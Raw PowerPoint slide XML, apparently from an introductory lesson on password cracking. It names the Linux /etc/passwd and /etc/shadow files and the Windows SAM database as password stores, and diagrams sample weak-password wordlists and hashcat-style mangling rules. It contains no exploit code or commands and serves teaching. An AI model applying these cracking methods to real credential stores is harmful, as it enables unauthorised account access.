                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7EEC22-7C42-6043-9BBB-2701600D196E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4239187"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ilovedogs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="34000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E421CE-12EF-8B42-943C-D9928A742CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5265950"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pa$$w0rd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82B32F8-988C-4845-86F3-CB97DEDE18E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5589245"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sportball3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0336E61F-96D6-8940-A0BE-582A6A3E6120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Wordlist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A12F6002-CC76-EB40-BF41-08AB840FDCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6403073" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Rule list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326A4514-1762-4847-9E6D-0C49F16716C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335621" y="4508260"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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7E5126C-EE55-3B42-854C-3429EBEF7EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294081" y="4960710"/>
            <a:ext cx="1642516" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>append #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDC6B83-D39D-8F45-A190-76FBDF44B530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292494" y="5295302"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>prepend #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1377CF9-4407-3346-8296-EAE984BA4229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292493" y="5681578"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*04 +0 '4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE28DDD6-A240-EA48-BC28-02F2B28B6656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292495" y="4335575"/>
            <a:ext cx="1526598" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Z5 *75 '5 { O02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Cross 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFB0114-1999-1243-99E0-54E76A8088D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067075" y="5076571"/>
            <a:ext cx="198082" cy="209092"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 38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2B08725-6433-E549-8CCF-9085679A77F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285568" y="4639297"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>flip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="30" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EA5AB9-5B69-8B48-88D4-2ABE56F915F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795921522"/>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784407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030E7ED3-BC2B-BE4E-8F40-2B766D479F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="2385573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where are passwords stored?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAM Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7CA5B4-80CC-C44E-ACAA-6122588012A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8383605" y="1075939"/>
            <a:ext cx="2645083" cy="383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Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C5C27B-EE6F-E74A-B465-D11F2B5D7F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368054" y="1554302"/>
            <a:ext cx="693683" cy="316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261679-C3F6-064B-BB76-F2E5FBEE2EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="1939499"/>
            <a:ext cx="2739676" cy="399393"/>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Hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA4E351-A9E8-B04D-A4E0-223D6F27CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="2585429"/>
            <a:ext cx="2758141" cy="728753"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A496BA-5F6C-E643-84B7-D982C01B4B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212577" y="2268222"/>
            <a:ext cx="693683" cy="49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E611C-7DD1-F14F-8515-679613C6594F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4472427"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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78FCCCE-6A42-B744-88DD-EBE2CFF84ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4942655"/>
            <a:ext cx="1531937" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>password1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AF286A-10F5-ED40-9688-9505E5469EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4619360"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7EEC22-7C42-6043-9BBB-2701600D196E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4239187"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ilovedogs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="34000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E421CE-12EF-8B42-943C-D9928A742CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5265950"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pa$$w0rd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82B32F8-988C-4845-86F3-CB97DEDE18E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5589245"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sportball3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0336E61F-96D6-8940-A0BE-582A6A3E6120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Wordlist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A12F6002-CC76-EB40-BF41-08AB840FDCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
